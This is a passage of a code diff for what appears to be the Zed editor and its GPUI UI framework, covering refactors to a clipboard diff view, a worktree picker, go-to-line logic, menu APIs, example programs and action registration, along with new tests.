- let (width, height) = (px(480.), px(320.));
-
- Some(
- v_flex()
- .gap_6()
- .children(vec![
- example_group(vec![
- single_example(
- "No Repo",
- div()
- .w(width)
- .h(height)
- .child(no_repo_state)
- .into_any_element(),
- ),
- single_example(
- "No Changes",
- div()
- .w(width)
- .h(height)
- .child(no_changes_state)
- .into_any_element(),
- ),
- single_example(
- "Unknown Upstream",
- div()
- .w(width)
- .h(height)
- .child(unknown_upstream_state)
- .into_any_element(),
- ),
- single_example(
- "Ahead of Remote",
- div()
- .w(width)
- .h(height)
- .child(ahead_of_upstream_state)
- .into_any_element(),
- ),
- ])
- .vertical(),
- ])
- .into_any_element(),
- )
- }
- }
-}
-
struct BranchDiffAddon {
branch_diff: Entity<branch_diff::BranchDiff>,
}
@@ -2,7 +2,10 @@
use anyhow::Result;
use buffer_diff::BufferDiff;
-use editor::{Editor, EditorEvent, MultiBuffer, ToPoint, actions::DiffClipboardWithSelectionData};
+use editor::{
+ Editor, EditorEvent, EditorSettings, MultiBuffer, SplittableEditor, ToPoint,
+ actions::DiffClipboardWithSelectionData,
+};
use futures::{FutureExt, select_biased};
use gpui::{
AnyElement, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FocusHandle,
@@ -10,6 +13,7 @@ use gpui::{
};
use language::{self, Buffer, Point};
use project::Project;
+use settings::Settings;
use std::{
any::{Any, TypeId},
cmp,
@@ -22,13 +26,13 @@ use ui::{Color, Icon, IconName, Label, LabelCommon as _, SharedString};
use util::paths::PathExt;
use workspace::{
- Item, ItemHandle as _, ItemNavHistory, Workspace,
+ Item, ItemNavHistory, Workspace,
item::{ItemEvent, SaveOptions, TabContentParams},
searchable::SearchableItemHandle,
};
pub struct TextDiffView {
- diff_editor: Entity<Editor>,
+ diff_editor: Entity<SplittableEditor>,
title: SharedString,
path: Option<SharedString>,
buffer_changes_tx: watch::Sender<()>,
@@ -47,11 +51,24 @@ impl TextDiffView {
let source_editor = diff_data.editor.clone();
let selection_data = source_editor.update(cx, |editor, cx| {
- let multibuffer = editor.buffer().read(cx);
- let source_buffer = multibuffer.as_singleton()?;
+ let multibuffer = editor.buffer();
let selections = editor.selections.all::<Point>(&editor.display_snapshot(cx));
- let buffer_snapshot = source_buffer.read(cx);
let first_selection = selections.first()?;
+
+ let (source_buffer, buffer_start, start_excerpt) = multibuffer
+ .read(cx)
+ .point_to_buffer_point(first_selection.start, cx)?;
+ let buffer_end = multibuffer
+ .read(cx)
+ .point_to_buffer_point(first_selection.end, cx)
+ .and_then(|(buf, pt, end_excerpt)| {
+ (buf.read(cx).remote_id() == source_buffer.read(cx).remote_id()
+ && end_excerpt == start_excerpt)
+ .then_some(pt)
+ })
+ .unwrap_or(buffer_start);
+
+ let buffer_snapshot = source_buffer.read(cx);
let max_point = buffer_snapshot.max_point();
if first_selection.is_empty() {
@@ -59,15 +76,12 @@ impl TextDiffView {
return Some((source_buffer, full_range));
}
- let start = first_selection.start;
- let end = first_selection.end;
- let expanded_start = Point::new(start.row, 0);
-
- let expanded_end = if end.column > 0 {
- let next_row = end.row + 1;
+ let expanded_start = Point::new(buffer_start.row, 0);
+ let expanded_end = if buffer_end.column > 0 {
+ let next_row = buffer_end.row + 1;
cmp::min(max_point, Point::new(next_row, 0))
} else {
- end
+ buffer_end
};
Some((source_buffer, expanded_start..expanded_end))
});
@@ -78,11 +92,24 @@ impl TextDiffView {
};
source_editor.update(cx, |source_editor, cx| {
- source_editor.change_selections(Default::default(), window, cx, |s| {
- s.select_ranges(vec![
- expanded_selection_range.start..expanded_selection_range.end,
- ]);
- })
+ let multibuffer = source_editor.buffer();
+ let mb_range = {
+ let mb = multibuffer.read(cx);
+ let start_anchor =
+ mb.buffer_point_to_anchor(&source_buffer, expanded_selection_range.start, cx);
+ let end_anchor =
+ mb.buffer_point_to_anchor(&source_buffer, expanded_selection_range.end, cx);
+ start_anchor.zip(end_anchor).map(|(s, e)| {
+ let snapshot = mb.snapshot(cx);
+ s.to_point(&snapshot)..e.to_point(&snapshot)
+ })
+ };
+
+ if let Some(range) = mb_range {
+ source_editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges(vec![range]);
+ });
+ }
});
let source_buffer_snapshot = source_buffer.read(cx).snapshot();
@@ -102,11 +129,11 @@ impl TextDiffView {
);
let task = window.spawn(cx, async move |cx| {
- let project = workspace.update(cx, |workspace, _| workspace.project().clone())?;
-
update_diff_buffer(&diff_buffer, &source_buffer, &clipboard_buffer, cx).await?;
workspace.update_in(cx, |workspace, window, cx| {
+ let project = workspace.project().clone();
+ let workspace_entity = cx.entity();
let diff_view = cx.new(|cx| {
TextDiffView::new(
clipboard_buffer,
@@ -115,6 +142,7 @@ impl TextDiffView {
expanded_selection_range,
diff_buffer,
project,
+ workspace_entity,
window,
cx,
)
@@ -139,6 +167,7 @@ impl TextDiffView {
source_range: Range<Point>,
diff_buffer: Entity<BufferDiff>,
project: Entity<Project>,
+ workspace: Entity<Workspace>,
window: &mut Window,
cx: &mut Context<Self>,
) -> Self {
@@ -151,21 +180,30 @@ impl TextDiffView {
multibuffer
});
let diff_editor = cx.new(|cx| {
- let mut editor = Editor::for_multibuffer(multibuffer, Some(project), window, cx);
- editor.start_temporary_diff_override();
- editor.disable_diagnostics(cx);
- editor.set_expand_all_diff_hunks(cx);
- editor.set_render_diff_hunk_controls(
+ let splittable = SplittableEditor::new(
+ EditorSettings::get_global(cx).diff_view_style,
+ multibuffer,
+ project,
+ workspace,
+ window,
+ cx,
+ );
+ splittable.set_render_diff_hunk_controls(
Arc::new(|_, _, _, _, _, _, _, _| gpui::Empty.into_any_element()),
cx,
);
- editor
+ splittable.rhs_editor().update(cx, |editor, cx| {
+ editor.start_temporary_diff_override();
+ editor.disable_diagnostics(cx);
+ editor.set_expand_all_diff_hunks(cx);
+ });
+ splittable
});
let (buffer_changes_tx, mut buffer_changes_rx) = watch::channel(());
cx.subscribe(&source_buffer, move |this, _, event, _| match event {
- language::BufferEvent::Edited
+ language::BufferEvent::Edited { .. }
| language::BufferEvent::LanguageChanged(_)
| language::BufferEvent::Reparsed => {
this.buffer_changes_tx.send(()).ok();
@@ -329,12 +367,14 @@ impl Item for TextDiffView {
&'a self,
type_id: TypeId,
self_handle: &'a Entity<Self>,
- _: &'a App,
+ cx: &'a App,
) -> Option<gpui::AnyEntity> {
if type_id == TypeId::of::<Self>() {
Some(self_handle.clone().into())
- } else if type_id == TypeId::of::<Editor>() {
+ } else if type_id == TypeId::of::<SplittableEditor>() {
Some(self.diff_editor.clone().into())
+ } else if type_id == TypeId::of::<Editor>() {
+ Some(self.diff_editor.read(cx).rhs_editor().clone().into())
} else {
None
}
@@ -349,7 +389,7 @@ impl Item for TextDiffView {
cx: &App,
f: &mut dyn FnMut(gpui::EntityId, &dyn project::ProjectItem),
) {
- self.diff_editor.for_each_project_item(cx, f)
+ self.diff_editor.read(cx).for_each_project_item(cx, f)
}
fn set_nav_history(
@@ -358,7 +398,8 @@ impl Item for TextDiffView {
_: &mut Window,
cx: &mut Context<Self>,
) {
- self.diff_editor.update(cx, |editor, _| {
+ let rhs = self.diff_editor.read(cx).rhs_editor().clone();
+ rhs.update(cx, |editor, _| {
editor.set_nav_history(Some(nav_history));
});
}
@@ -439,11 +480,12 @@ impl Render for TextDiffView {
#[cfg(test)]
mod tests {
use super::*;
- use editor::{MultiBufferOffset, test::editor_test_context::assert_state_with_diff};
- use gpui::{TestAppContext, VisualContext};
+ use editor::{MultiBufferOffset, PathKey, test::editor_test_context::assert_state_with_diff};
+ use gpui::{BorrowAppContext, TestAppContext, VisualContext};
+ use language::Point;
use project::{FakeFs, Project};
use serde_json::json;
- use settings::SettingsStore;
+ use settings::{DiffViewStyle, SettingsStore};
use unindent::unindent;
use util::{path, test::marked_text_ranges};
use workspace::MultiWorkspace;
@@ -452,6 +494,11 @@ mod tests {
cx.update(|cx| {
let settings_store = SettingsStore::test(cx);
cx.set_global(settings_store);
+ cx.update_global::<SettingsStore, _>(|store, cx| {
+ store.update_user_settings(cx, |settings| {
+ settings.editor.diff_view_style = Some(DiffViewStyle::Unified);
+ });
+ });
theme::init(theme::LoadThemes::JustBase, cx);
});
}
@@ -643,6 +690,185 @@ mod tests {
.await;
}
+ #[gpui::test]
+ async fn test_diffing_clipboard_from_multibuffer_with_selection(cx: &mut TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "a.txt": "alpha\nbeta\ngamma",
+ "b.txt": "one\ntwo\nthree"
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+
+ let buffer_a = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/a.txt"), cx)
+ })
+ .await
+ .unwrap();
+ let buffer_b = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/b.txt"), cx)
+ })
+ .await
+ .unwrap();
+
+ let (multi_workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+
+ let editor = cx.new_window_entity(|window, cx| {
+ let multibuffer = cx.new(|cx| {
+ let mut mb = MultiBuffer::new(language::Capability::ReadWrite);
+ mb.set_excerpts_for_path(
+ PathKey::sorted(0),
+ buffer_a.clone(),
+ [Point::new(0, 0)..Point::new(2, 5)],
+ 0,
+ cx,
+ );
+ mb.set_excerpts_for_path(
+ PathKey::sorted(1),
+ buffer_b.clone(),
+ [Point::new(0, 0)..Point::new(2, 5)],
+ 0,
+ cx,
+ );
+ mb
+ });
+
+ let mut editor =
+ Editor::for_multibuffer(multibuffer, Some(project.clone()), window, cx);
+ // Select "beta" inside the first excerpt
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(6)..MultiBufferOffset(10)]);
+ });
+ editor
+ });
+
+ let diff_view = workspace
+ .update_in(cx, |workspace, window, cx| {
+ TextDiffView::open(
+ &DiffClipboardWithSelectionData {
+ clipboard_text: "REPLACED".to_string(),
+ editor,
+ },
+ workspace,
+ window,
+ cx,
+ )
+ })
+ .unwrap()
+ .await
+ .unwrap();
+
+ cx.executor().run_until_parked();
+
+ diff_view.read_with(cx, |diff_view, _cx| {
+ assert!(
+ diff_view.title.contains("Clipboard"),
+ "diff view should have opened with a clipboard diff title, got: {}",
+ diff_view.title
+ );
+ });
+ }
+
+ #[gpui::test]
+ async fn test_diffing_clipboard_from_multibuffer_with_empty_selection(cx: &mut TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "a.txt": "alpha\nbeta\ngamma",
+ "b.txt": "one\ntwo\nthree"
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+
+ let buffer_a = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/a.txt"), cx)
+ })
+ .await
+ .unwrap();
+ let buffer_b = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/b.txt"), cx)
+ })
+ .await
+ .unwrap();
+
+ let (multi_workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone());
+
+ let editor = cx.new_window_entity(|window, cx| {
+ let multibuffer = cx.new(|cx| {
+ let mut mb = MultiBuffer::new(language::Capability::ReadWrite);
+ mb.set_excerpts_for_path(
+ PathKey::sorted(0),
+ buffer_a.clone(),
+ [Point::new(0, 0)..Point::new(2, 5)],
+ 0,
+ cx,
+ );
+ mb.set_excerpts_for_path(
+ PathKey::sorted(1),
+ buffer_b.clone(),
+ [Point::new(0, 0)..Point::new(2, 5)],
+ 0,
+ cx,
+ );
+ mb
+ });
+
+ let mut editor =
+ Editor::for_multibuffer(multibuffer, Some(project.clone()), window, cx);
+ // Cursor inside the first excerpt (no selection)
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(6)..MultiBufferOffset(6)]);
+ });
+ editor
+ });
+
+ let diff_view = workspace
+ .update_in(cx, |workspace, window, cx| {
+ TextDiffView::open(
+ &DiffClipboardWithSelectionData {
+ clipboard_text: "REPLACED".to_string(),
+ editor,
+ },
+ workspace,
+ window,
+ cx,
+ )
+ })
+ .unwrap()
+ .await
+ .unwrap();
+
+ cx.executor().run_until_parked();
+
+ // Empty selection should diff the full underlying buffer
+ diff_view.read_with(cx, |diff_view, _cx| {
+ assert!(
+ diff_view.title.contains("Clipboard"),
+ "diff view should have opened with a clipboard diff title, got: {}",
+ diff_view.title
+ );
+ });
+ }
+
async fn base_test(
project_root: &str,
file_path: &str,
@@ -715,7 +941,9 @@ mod tests {
cx.executor().run_until_parked();
assert_state_with_diff(
- &diff_view.read_with(cx, |diff_view, _| diff_view.diff_editor.clone()),
+ &diff_view.read_with(cx, |diff_view, cx| {
+ diff_view.diff_editor.read(cx).rhs_editor().clone()
+ }),
cx,
expected_diff,
);
@@ -2,7 +2,7 @@ use anyhow::Context as _;
use collections::HashSet;
use fuzzy::StringMatchCandidate;
-use git::repository::{Worktree as GitWorktree, validate_worktree_directory};
+use git::repository::Worktree as GitWorktree;
use gpui::{
Action, App, AsyncWindowContext, Context, DismissEvent, Entity, EventEmitter, FocusHandle,
Focusable, InteractiveElement, IntoElement, Modifiers, ModifiersChangedEvent, ParentElement,
@@ -96,9 +96,12 @@ impl WorktreeList {
});
cx.spawn_in(window, async move |this, cx| {
- let all_worktrees = all_worktrees_request
+ let all_worktrees: Vec<_> = all_worktrees_request
.context("No active repository")?
- .await??;
+ .await??
+ .into_iter()
+ .filter(|worktree| worktree.ref_name.is_some()) // hide worktrees without a branch
+ .collect();
let default_branch = default_branch_request
.context("No active repository")?
@@ -182,7 +185,7 @@ impl WorktreeList {
return;
}
picker.delegate.create_worktree(
- entry.worktree.branch(),
+ entry.worktree.display_name(),
replace_current_window,
Some(default_branch.into()),
window,
@@ -300,11 +303,10 @@ impl WorktreeListDelegate {
.git
.worktree_directory
.clone();
- let original_repo = repo.original_repo_abs_path.clone();
- let directory =
- validate_worktree_directory(&original_repo, &worktree_directory_setting)?;
- let new_worktree_path = directory.join(&branch);
- let receiver = repo.create_worktree(branch.clone(), directory, commit);
+ let new_worktree_path =
+ repo.path_for_new_linked_worktree(&branch, &worktree_directory_setting)?;
+ let receiver =
+ repo.create_worktree(branch.clone(), new_worktree_path.clone(), commit);
anyhow::Ok((receiver, new_worktree_path))
})?;
receiver.await??;
@@ -650,7 +652,7 @@ impl PickerDelegate for WorktreeListDelegate {
let candidates = all_worktrees
.iter()
.enumerate()
- .map(|(ix, worktree)| StringMatchCandidate::new(ix, worktree.branch()))
+ .map(|(ix, worktree)| StringMatchCandidate::new(ix, worktree.display_name()))
.collect::<Vec<StringMatchCandidate>>();
fuzzy::match_strings(
&candidates,
@@ -675,13 +677,13 @@ impl PickerDelegate for WorktreeListDelegate {
if !query.is_empty()
&& !matches
.first()
- .is_some_and(|entry| entry.worktree.branch() == query)
+ .is_some_and(|entry| entry.worktree.display_name() == query)
{
let query = query.replace(' ', "-");
matches.push(WorktreeEntry {
worktree: GitWorktree {
path: Default::default(),
- ref_name: format!("refs/heads/{query}").into(),
+ ref_name: Some(format!("refs/heads/{query}").into()),
sha: Default::default(),
},
positions: Vec::new(),
@@ -707,7 +709,7 @@ impl PickerDelegate for WorktreeListDelegate {
return;
};
if entry.is_new {
- self.create_worktree(&entry.worktree.branch(), secondary, None, window, cx);
+ self.create_worktree(&entry.worktree.display_name(), secondary, None, window, cx);
} else {
self.open_worktree(&entry.worktree.path, secondary, window, cx);
}
@@ -738,16 +740,19 @@ impl PickerDelegate for WorktreeListDelegate {
let (branch_name, sublabel) = if entry.is_new {
(
- Label::new(format!("Create Worktree: \"{}\"…", entry.worktree.branch()))
- .truncate()
- .into_any_element(),
+ Label::new(format!(
+ "Create Worktree: \"{}\"…",
+ entry.worktree.display_name()
+ ))
+ .truncate()
+ .into_any_element(),
format!(
"based off {}",
self.base_branch(cx).unwrap_or("the current branch")
),
)
} else {
- let branch = entry.worktree.branch();
+ let branch = entry.worktree.display_name();
let branch_first_line = branch.lines().next().unwrap_or(branch);
let positions: Vec<_> = entry
.positions
@@ -17,6 +17,7 @@ editor.workspace = true
gpui.workspace = true
language.workspace = true
menu.workspace = true
+multi_buffer.workspace = true
serde.workspace = true
settings.workspace = true
text.workspace = true
@@ -2,7 +2,7 @@ pub mod cursor_position;
use cursor_position::UserCaretPosition;
use editor::{
- Anchor, Editor, MultiBufferSnapshot, RowHighlightOptions, SelectionEffects, ToOffset, ToPoint,
+ Anchor, Editor, MultiBufferSnapshot, RowHighlightOptions, SelectionEffects, ToPoint,
actions::Tab,
scroll::{Autoscroll, ScrollOffset},
};
@@ -11,6 +11,7 @@ use gpui::{
Subscription, div, prelude::*,
};
use language::Buffer;
+use multi_buffer::MultiBufferRow;
use text::{Bias, Point};
use theme::ActiveTheme;
use ui::prelude::*;
@@ -228,31 +229,14 @@ impl GoToLine {
let row = query_row.saturating_sub(1);
let character = query_char.unwrap_or(0).saturating_sub(1);
- let start_offset = Point::new(row, 0).to_offset(snapshot);
- const MAX_BYTES_IN_UTF_8: u32 = 4;
- let max_end_offset = snapshot
- .clip_point(
- Point::new(row, character * MAX_BYTES_IN_UTF_8 + 1),
- Bias::Right,
- )
- .to_offset(snapshot);
-
- let mut chars_to_iterate = character;
- let mut end_offset = start_offset;
- 'outer: for text_chunk in snapshot.text_for_range(start_offset..max_end_offset) {
- let mut offset_increment = 0;
- for c in text_chunk.chars() {
- if chars_to_iterate == 0 {
- end_offset += offset_increment;
- break 'outer;
- } else {
- chars_to_iterate -= 1;
- offset_increment += c.len_utf8();
- }
- }
- end_offset += offset_increment;
- }
- Some(snapshot.anchor_before(snapshot.clip_offset(end_offset, Bias::Left)))
+ let target_multi_buffer_row = MultiBufferRow(row);
+ let (buffer_snapshot, target_in_buffer, _) = snapshot.point_to_buffer_point(Point::new(
+ target_multi_buffer_row.min(snapshot.max_row()).0,
+ 0,
+ ))?;
+ let target_point =
+ buffer_snapshot.point_from_external_input(target_in_buffer.row, character);
+ Some(snapshot.anchor_before(target_point))
}
fn relative_line_from_query(&self, cx: &App) -> Option<i32> {
@@ -144,7 +144,7 @@ windows = { version = "0.61", features = ["Win32_Foundation"] }
backtrace.workspace = true
collections = { workspace = true, features = ["test-support"] }
env_logger.workspace = true
-gpui_platform.workspace = true
+gpui_platform = { workspace = true, features = ["font-kit"] }
lyon = { version = "1.0", features = ["extra"] }
rand.workspace = true
scheduler = { workspace = true, features = ["test-support"] }
@@ -181,6 +181,7 @@ fn run_example() {
cx.set_menus(vec![Menu {
name: "Image".into(),
items: vec![MenuItem::action("Quit", Quit)],
+ disabled: false,
}]);
let window_options = WindowOptions {
@@ -273,10 +273,7 @@ fn run_example() {
cx.activate(true);
cx.on_action(|_: &Quit, cx| cx.quit());
cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]);
- cx.set_menus(vec![Menu {
- name: "Image Gallery".into(),
- items: vec![MenuItem::action("Quit", Quit)],
- }]);
+ cx.set_menus([Menu::new("Image Gallery").items([MenuItem::action("Quit", Quit)])]);
let window_options = WindowOptions {
titlebar: Some(TitlebarOptions {
@@ -56,21 +56,23 @@ impl HelloWorld {
}))
.when(self.secondary_open, |this| {
this.child(
- // GPUI can't support deferred here yet,
- // it was inside another deferred element.
- anchored()
- .anchor(Corner::TopLeft)
- .snap_to_window_with_margin(px(8.))
- .child(
- popover()
- .child("This is second level Popover")
- .bg(gpui::white())
- .border_color(gpui::blue())
- .on_mouse_down_out(cx.listener(|this, _, _, cx| {
- this.secondary_open = false;
- cx.notify();
- })),
- ),
+ // Now GPUI supports nested deferred!
+ deferred(
+ anchored()
+ .anchor(Corner::TopLeft)
+ .snap_to_window_with_margin(px(8.))
+ .child(
+ popover()
+ .child("This is second level Popover with nested deferred!")
+ .bg(gpui::white())
+ .border_color(gpui::blue())
+ .on_mouse_down_out(cx.listener(|this, _, _, cx| {
+ this.secondary_open = false;
+ cx.notify();
+ })),
+ ),
+ )
+ .priority(2),
)
})
}
@@ -2,7 +2,7 @@
use gpui::{
App, Context, Global, Menu, MenuItem, SharedString, SystemMenuType, Window, WindowOptions,
- actions, div, prelude::*, rgb,
+ actions, div, prelude::*,
};
use gpui_platform::application;
@@ -12,12 +12,12 @@ impl Render for SetMenus {
fn render(&mut self, _window: &mut Window, _cx: &mut Context<Self>) -> impl IntoElement {
div()
.flex()
- .bg(rgb(0x2e7d32))
+ .bg(gpui::white())
.size_full()
.justify_center()
.items_center()
.text_xl()
- .text_color(rgb(0xffffff))
+ .text_color(gpui::black())
.child("Set Menus Example")
}
}
@@ -28,7 +28,8 @@ fn run_example() {
// Bring the menu bar to the foreground (so you can see the menu bar)
cx.activate(true);
- // Register the `quit` function so it can be referenced by the `MenuItem::action` in the menu bar
+ // Register the `quit` function so it can be referenced
+ // by the `MenuItem::action` in the menu bar
cx.on_action(quit);
cx.on_action(toggle_check);
// Add menu items
@@ -91,19 +92,24 @@ impl Global for AppState {}
fn set_app_menus(cx: &mut App) {
let app_state = cx.global::<AppState>();
- cx.set_menus(vec![Menu {
- name: "set_menus".into(),
- items: vec![
- MenuItem::os_submenu("Services", SystemMenuType::Services),
- MenuItem::separator(),
- MenuItem::action(ViewMode::List, ToggleCheck)
- .checked(app_state.view_mode == ViewMode::List),
- MenuItem::action(ViewMode::Grid, ToggleCheck)
- .checked(app_state.view_mode == ViewMode::Grid),
- MenuItem::separator(),
- MenuItem::action("Quit", Quit),
- ],
- }]);
+ cx.set_menus([Menu::new("set_menus").items([
+ MenuItem::os_submenu("Services", SystemMenuType::Services),
+ MenuItem::separator(),
+ MenuItem::action("Disabled Item", gpui::NoAction).disabled(true),
+ MenuItem::submenu(Menu::new("Disabled Submenu").disabled(true)),
+ MenuItem::separator(),
+ MenuItem::action("List Mode", ToggleCheck).checked(app_state.view_mode == ViewMode::List),
+ MenuItem::submenu(
+ Menu::new("Mode").items([
+ MenuItem::action(ViewMode::List, ToggleCheck)
+ .checked(app_state.view_mode == ViewMode::List),
+ MenuItem::action(ViewMode::Grid, ToggleCheck)
+ .checked(app_state.view_mode == ViewMode::Grid),
+ ]),
+ ),
+ MenuItem::separator(),
+ MenuItem::action("Quit", Quit),
+ ])]);
}
// Associate actions using the `actions!` macro (or `Action` derive macro)
@@ -111,7 +117,7 @@ actions!(set_menus, [Quit, ToggleCheck]);
// Define the quit function that is registered with the App
fn quit(_: &Quit, cx: &mut App) {
- println!("Gracefully quitting the application . . .");
+ println!("Gracefully quitting the application...");
cx.quit();
}
@@ -1,6 +1,7 @@
#![cfg_attr(target_family = "wasm", no_main)]
use std::{
+ borrow::Cow,
ops::{Deref, DerefMut},
sync::Arc,
};
@@ -204,7 +205,7 @@ impl RenderOnce for CharacterGrid {
"❮", "<=", "!=", "==", "--", "++", "=>", "->", "🏀", "🎊", "😍", "❤️", "👍", "👎",
];
- let columns = 11;
+ let columns = 20;
let rows = characters.len().div_ceil(columns);
let grid_rows = (0..rows).map(|row_idx| {
@@ -238,6 +239,7 @@ impl RenderOnce for CharacterGrid {
struct TextExample {
next_id: usize,
+ font_family: SharedString,
}
impl TextExample {
@@ -245,8 +247,33 @@ impl TextExample {
self.next_id += 1;
self.next_id
}
+
+ fn button(
+ text: &str,
+ cx: &mut Context<Self>,
+ on_click: impl Fn(&mut Self, &mut Context<Self>) + 'static,
+ ) -> impl IntoElement {
+ div()
+ .id(text.to_string())
+ .flex_none()
+ .child(text.to_string())
+ .bg(gpui::black())
+ .text_color(gpui::white())
+ .active(|this| this.opacity(0.8))
+ .px_3()
+ .py_1()
+ .on_click(cx.listener(move |this, _, _, cx| on_click(this, cx)))
+ }
}
+const FONT_FAMILIES: [&str; 5] = [
+ ".ZedMono",
+ ".SystemUIFont",
+ "Menlo",
+ "Monaco",
+ "Courier New",
+];
+
impl Render for TextExample {
fn render(&mut self, _window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
let tcx = cx.text_context();
@@ -265,7 +292,26 @@ impl Render for TextExample {
let step_up_6 = step_up_5 * type_scale;
div()
+ .font_family(self.font_family.clone())
.size_full()
+ .child(
+ div()
+ .bg(gpui::white())
+ .border_b_1()
+ .border_color(gpui::black())
+ .p_3()
+ .flex()
+ .child(Self::button(&self.font_family, cx, |this, cx| {
+ let new_family = FONT_FAMILIES
+ .iter()
+ .position(|f| *f == this.font_family.as_str())
+ .map(|idx| FONT_FAMILIES[(idx + 1) % FONT_FAMILIES.len()])
+ .unwrap_or(FONT_FAMILIES[0]);
+
+ this.font_family = SharedString::new(new_family);
+ cx.notify();
+ })),
+ )
.child(
div()
.id("text-example")
@@ -304,9 +350,19 @@ fn run_example() {
application().run(|cx: &mut App| {
cx.set_menus(vec![Menu {
name: "GPUI Typography".into(),
+ disabled: false,
items: vec![],
}]);
+ let fonts = [include_bytes!(
+ "../../../assets/fonts/lilex/Lilex-Regular.ttf"
+ )]
+ .iter()
+ .map(|b| Cow::Borrowed(&b[..]))
+ .collect();
+
+ _ = cx.text_system().add_fonts(fonts);
+
cx.init_colors();
cx.set_global(GlobalTextContext(Arc::new(TextContext::default())));
@@ -323,7 +379,12 @@ fn run_example() {
))),
..Default::default()
},
- |_window, cx| cx.new(|_cx| TextExample { next_id: 0 }),
+ |_window, cx| {
+ cx.new(|_cx| TextExample {
+ next_id: 0,
+ font_family: ".ZedMono".into(),
+ })
+ },
)
.unwrap();
@@ -1,7 +1,7 @@
use anyhow::{Context as _, Result};
use collections::HashMap;
pub use gpui_macros::Action;
-pub use no_action::{NoAction, is_no_action};
+pub use no_action::{NoAction, Unbind, is_no_action, is_unbind};
use serde_json::json;
use std::{
any::{Any, TypeId},
@@ -290,19 +290,6 @@ impl ActionRegistry {
}
}
- #[cfg(test)]
- pub(crate) fn load_action<A: Action>(&mut self) {
- self.insert_action(MacroActionData {
- name: A::name_for_type(),
- type_id: TypeId::of::<A>(),
- build: A::build,
- json_schema: A::action_json_schema,
- deprecated_aliases: A::deprecated_aliases(),
- deprecation_message: A::deprecation_message(),
- documentation: A::documentation(),
- });
- }
-
fn insert_action(&mut self, action: MacroActionData) {
let name = action.name;
if self.by_name.contains_key(name) {
@@ -432,7 +419,8 @@ pub fn generate_list_of_all_registered_actions() -> impl Iterator<Item = MacroAc
mod no_action {
use crate as gpui;
- use std::any::Any as _;
+ use schemars::JsonSchema;
+ use serde::Deserialize;
actions!(
zed,
@@ -443,8 +431,23 @@ mod no_action {
]
);
+ /// Action with special handling which unbinds later bindings for the same keystrokes when they
+ /// dispatch the named action, regardless of that action's context.
+ ///
+ /// In keymap JSON this is written as:
+ ///
+ /// `["zed::Unbind", "editor::NewLine"]`
+ #[derive(Clone, Debug, PartialEq, Deserialize, JsonSchema, gpui::Action)]
+ #[action(namespace = zed)]
+ pub struct Unbind(pub gpui::SharedString);
+
/// Returns whether or not this action represents a removed key binding.
pub fn is_no_action(action: &dyn gpui::Action) -> bool {
- action.as_any().type_id() == (NoAction {}).type_id()
+ action.as_any().is::<NoAction>()
+ }
+
+ /// Returns whether or not this action represents an unbind marker.
+ pub fn is_unbind(action: &dyn gpui::Action) -> bool {
+ action.as_any().is::<Unbind>()
}
}
@@ -27,9 +27,13 @@ use collections::{FxHashMap, FxHashSet, HashMap, VecDeque};
pub use context::*;
pub use entity_map::*;
use gpui_util::{ResultExt, debug_panic};
+#[cfg(any(test, feature = "test-support"))]
+pub use headless_app_context::*;
use http_client::{HttpClient, Url};
use smallvec::SmallVec;
#[cfg(any(test, feature = "test-support"))]
+pub use test_app::*;
+#[cfg(any(test, feature = "test-support"))]
pub use test_context::*;
#[cfg(all(target_os = "macos", any(test, feature = "test-support")))]
pub use visual_test_context::*;
@@ -45,7 +49,8 @@ use crate::{
PlatformKeyboardMapper, Point, Priority, PromptBuilder, PromptButton, PromptHandle,
PromptLevel, Render, RenderImage, RenderablePromptHandle, Reservation, ScreenCaptureSource,
SharedString, SubscriberSet, Subscription, SvgRenderer, Task, TextRenderingMode, TextSystem,
- ThermalState, Window, WindowAppearance, WindowHandle, WindowId, WindowInvalidator,
+ ThermalState, Window, WindowAppearance, WindowButtonLayout, WindowHandle, WindowId,
+ WindowInvalidator,
colors::{Colors, GlobalColors},
hash, init_app_menus,
};
@@ -54,6 +59,10 @@ mod async_context;
mod context;
mod entity_map;
#[cfg(any(test, feature = "test-support"))]
+mod headless_app_context;
+#[cfg(any(test, feature = "test-support"))]
+mod test_app;
+#[cfg(any(test, feature = "test-support"))]
mod test_context;
#[cfg(all(target_os = "macos", any(test, feature = "test-support")))]
mod visual_test_context;
@@ -571,21 +580,13 @@ impl GpuiMode {
pub struct App {
pub(crate) this: Weak<AppCell>,
pub(crate) platform: Rc<dyn Platform>,
- pub(crate) mode: GpuiMode,
text_system: Arc<TextSystem>,
- flushing_effects: bool,
- pending_updates: usize,
+
pub(crate) actions: Rc<ActionRegistry>,
pub(crate) active_drag: Option<AnyDrag>,
pub(crate) background_executor: BackgroundExecutor,
pub(crate) foreground_executor: ForegroundExecutor,
- pub(crate) loading_assets: FxHashMap<(TypeId, u64), Box<dyn Any>>,
- asset_source: Arc<dyn AssetSource>,
- pub(crate) svg_renderer: SvgRenderer,
- http_client: Arc<dyn HttpClient>,
- pub(crate) globals_by_type: FxHashMap<TypeId, Box<dyn Any>>,
pub(crate) entities: EntityMap,
- pub(crate) window_update_stack: Vec<WindowId>,
pub(crate) new_entity_observers: SubscriberSet<TypeId, NewEntityListener>,
